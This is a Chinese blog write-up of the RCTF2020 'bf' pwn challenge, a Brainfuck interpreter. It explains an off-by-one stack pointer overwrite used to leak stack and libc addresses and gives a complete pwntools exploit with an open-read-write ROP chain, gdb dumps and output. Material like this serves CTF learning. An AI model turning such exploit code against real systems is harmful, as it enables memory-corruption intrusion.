[BMZCTF-pwn] 42-rctf2020-bf

最新推荐文章于 2022-10-19 20:14:36 发布
最新推荐文章于 2022-10-19 20:14:36 发布
阅读量516 收藏
点赞数
分类专栏: CTF pwn 文章标签: BrainFuck 栈溢出 libc泄露 ROP exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123061212
版权

一直没明白BrainFuck是个啥东西,学着作一遍,这个大概就有点明白了。

BrainFuck一共有8个符号分别是“<>”移动指针 []循环 “+-”指针处值增减1 “.”输出“,”输入

思路:

  1. 当输入长度较小里会被放在栈里,并有一个栈里的指针。先利用一个循环将指针移溢出到栈指针处,并输入一个数覆盖尾字节,用这个字节调整指向的位置。泄露rbp和libc
  2. 将指针指向返回地址处,在这里写入rop
  3. rop由BrainFuck代码读入,然后当回返里移栈到这里进行orw

完整exp:

from pwn import *

elf = ELF('./pwn')
libc_elf = ELF('/home/shi/buuctf/buuoj_2.27_amd64/libc-2.27.so')
one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
libc_start_main_ret = 0x21b97
context(arch='amd64', log_level='critical')

def connect(local=1):
    if local == 1:
        p = process('./pwn')
    else:
        p = remote('node4.buuoj.cn', 27672) 
    return p


def pwn():
    #get stack
    payload = b'+[>+],' #Brainfuck
    p.sendlineafter(b"enter your code:", payload)  #len(payload)<=8 -->stack >8 -->heap
    p.sendafter(b"running....", b'\xb0')
    p.recvuntil(b"done! your code: ", timeout=0.2)
    tmp = u64(p.recv(6).ljust(8, b'\x00'))
    if tmp>>40 != 0x7f:
        raise('no stack ...')

    stack = tmp
    print('stack', hex(tmp))

    #get libc
    p.sendafter(b"want to continue?", b'y')
    p.sendlineafter(b"enter your code:", payload)
    p.sendafter(b"running....", b'\xc8')
    p.recvuntil(b"done! your code: ", timeout=0.2)
    tmp = u64(p.recv(6).ljust(8, b'\x00'))
    if tmp>>40 != 0x7f:
        raise('no libc ...')

    libc_base = tmp - libc_start_main_ret
    libc_elf.address = libc_base
    print('libc:', hex(tmp))
    #gdb.attach(p)
    #pause()

    pop_rdi = next(libc_elf.search(asm('pop rdi; ret')))
    pop_rsi = next(libc_elf.search(asm('pop rsi; ret')))
    pop_rdx = next(libc_elf.search(asm('pop rdx; ret')))
    pop_rsp = next(libc_elf.search(asm('pop rsp; ret')))

    rop_addr  = stack    - 0x1c0
    flag_addr = rop_addr + 0x98
    
    #3
    p.sendafter(b"want to continue?", b'y')
    p.sendlineafter(b"enter your code:", payload)
    p.sendafter(b"running....", b'\xc0')
    
    #4
    p.sendafter(b"want to continue?", b'y')
    payload = b'+[,>+],a' + p64(pop_rsp) + p64(rop_addr)
    p.sendlineafter(b"enter your code:", payload)
    
    rop = flat(pop_rdi, flag_addr, pop_rsi, 0, libc_elf.sym['open'],
               pop_rdi, 3, pop_rsi, flag_addr, pop_rdx, 0x30, libc_elf.sym['read'],
               pop_rdi, 1, pop_rsi, flag_addr, pop_rdx, 0x30, libc_elf.sym['write'],
               b'./flag\x00a')
    rop = rop.rjust(0x400, b'a') + b'\x90'  #操作区总长度0x400 在后部写rop
    #p.sendafter(b"running....", rop.rlust(0x400, b'a') + b'a' + b'\x90')
    for i in range(0x401):
        p.send(rop[i: i+1])
        
    p.interactive()

while True:
    try:
        p = connect(1)
        pwn()
    except KeyboardInterrupt as e:
        exit()
    except:
        p.close()
    
'''
Brainfuck        C
>,<               ++ptr;--ptr;
+,-               ++*ptr;--*ptr;
.                 putchar(*ptr);
,                 *ptr =getch();
[,]               while (*ptr) { xxx }

gdb-peda$ tel 0x7ffd98a74490-0x90 30
0000| 0x7ffd98a74400 --> 0x101010101010101 
...
0120| 0x7ffd98a74478 --> 0x101010101010101 
0128| 0x7ffd98a74480 --> 0x7ffd98a744(b0) --> 0x7ffd98a745a0 --> 0x1     #string       0 b0:stack,c8:libc_ret 指向输入串,修改为指向rbp
0136| 0x7ffd98a74488 --> 0x6                                             #             1
0144| 0x7ffd98a74490 --> 0x2c5d2b3e5b2b ('+[>+],')                       #             2 当输入小于8时存在栈内
0152| 0x7ffd98a74498 --> 0x0                                             #             3
0160| 0x7ffd98a744a0 --> 0x5626734fb980 (push   r15)                     #             4
0168| 0x7ffd98a744a8 --> 0xe60fa378106a5400                              #canary       5
0176| 0x7ffd98a744b0 --> 0x7ffd98a745a0 --> 0x1                          #0xb0 ptr->0  6
0184| 0x7ffd98a744b8 --> 0x0                                                           7
0192| 0x7ffd98a744c0 --> 0x5626734fb980 (push   r15)                     #0xc0 rbp
0200| 0x7ffd98a744c8 --> 0x7f2e71c0fb97 (<__libc_start_main+231>)        #0xc8 libc_start_main_ret


shi@ubuntu:~/bmzclub.pwn/42_rctf2020-bf$ py a.py
stack 0x7ffe91f2efb0
stack 0x7ffcaaa40ea0
libc: 0x7f7f7fef3b97


running....

done! your code: +[>+],\x00\x00\x00\x00\x00\x80\xd9\xf8|JV\x00
want to continue?
$ 
flag{test_flag!!!!!!!!!!!!!!!!!!}
\x00\x00\x00\x80\xd9\xf8|JV\x00$ 

'''

石氏是时试
关注
专栏目录
复现 | RCTF2020逆向cipher
Ms08067安全实验室
08-16 945
本文作者:rookiedrag*(二进制逆向星球学员)最近学习用了一下ghidra !Mips工具反汇编工具有ghidra,jeb,ida,插件retdec(我觉得不好用),听说现在id...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
RCTF2020_bf(string指针的利用)
seaaseesa的博客
06-11 657
RCTF2020_bf(string指针的利用) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,发现是一个brain fuck语言的解释器,其中在>指令操作中,存在一个off by one,ptr指针可以指向string对象, 然后,通过后面的read等操作,可以控制string内部第一个指针的低1字节 而结尾的时候,会输出string指针指向的地方的内容 因此,控制string指针,我们现在可以完成数据泄露。 String对象内部有这4个成员,我们能够通过off
PWN:intorw
m0_53932372的博客
10-19 161
pwn
[BMZCTF-pwn] 22-pwn1
weixin_52640415的博客
02-16 185
昨天整了第一届BMZCTFpwn题,都来得及写。这一届一共五个pwn题,难度逐个增加。 第一个是个32位no pie,got表可写。程序很短,直接调用无格式参数的printf,而且有循环,got表还有system项。基本属于无障碍型。 int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char s[100]; // [esp+18h] [ebp-70h] BYREF unsigned i
[BMZTCF-pwn] 46-rctf2020-note
weixin_52640415的博客
02-22 3371
libc-2.29 calloc建块,有两个后门一个可多写8字节一个可多写0x20字节 前边有个小冒,建块时需要money作size,由于用的是无符号数,不能直接用负数绕过,但由于他用了乘法,可以用乘法溢出: if ( 857 * size > (unsigned __int64)qword_4010 )return puts("You don't have enough money!"); 当size*857=A时,只要A的前半部分超过64位,后半部门很小就能绕过,这里直接用一个刚溢出的数除
[BMZCTF-pwn] 48_gactf2020-vmpwn
weixin_52640415的博客
02-24 1072
虚拟机太麻烦了,有一块不明白看了个exp,但是明显这个exp的命令格式不对。但大意明白了。 为防自己以后不明白,把说明写到注释里。也就不用写别的了。全在代码里了。 from pwn import * local = 1 if local == 1: p = process('./pwn') else: p = remote('1.1.1.1', 28546) libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-
[BMZCTF-pwn] 00-pwnpwnpwn
weixin_52640415的博客
02-11 1260
BUUCTF的题作到0解区,既作不出来也找到不wp,放弃了。今天开始上xctfclub.cn上来玩。 一般题都是从简单开始,也不一定,一上来就是个盲pwn 。 远程连接后,输出欢迎信息,然后输入后会回显。 思路: 如果是堆啥的怎么也得给点,不给就没办法了,至少有个泄露。这里的回显猜是printf的输出用AAAA-%x-%x...测试,可以得到一些有用信息 有0804XXXX这个应该是32位no pie #3 得到个栈地址指向输入串,不清楚怎么用, #10是输入偏移 #39是libc_s
[BMZCTF-pwn] 20-secret_file
weixin_52640415的博客
02-15 2830
栈内溢出的题 读完程序也就完事了 __int64 __fastcall main(int a1, char **a2, char **a3) { char *v3; // rax unsigned __int8 *v4; // rbp char *v5; // rbx __int64 v6; // rcx char *v7; // rdi unsigned int v8; // er12 FILE *v9; // rbp size_t v11; // [rsp+0h]
[XCTF-pwn] 33_rctf-2015_nobug
weixin_52640415的博客
03-10 433
格式化字符串漏洞 snprintf 程序先读入串,再用snprintf输出,由于snprintf有长度限制,每次只能一位一位的改。 int sub_8048B76() { size_t v0; // eax const char *v1; // eax v0 = strlen(s); v1 = (const char *)sub_804869D(s, v0, 0); return snprintf(byte_804A8A0, 0x800u, "%s", v1); } 思路:
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
动态加载概述与原理.docx
最新发布
11-07
动态加载概述与原理.docx
LOL_params_0900000.pt
11-07
LOL_params_0900000.pt
分群用户详情_7_2024-09-06 09_49_58.xlsx
11-07
分群用户详情_7_2024-09-06 09_49_58
动态加载的高级主题:懒加载与按需加载.docx
11-07
动态加载的高级主题:懒加载与按需加载.docx
【超强组合】基于VMD-开普勒优化算法KOA-Transformer-LSTM的光伏预测算研究Matlab实现.rar
11-07
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值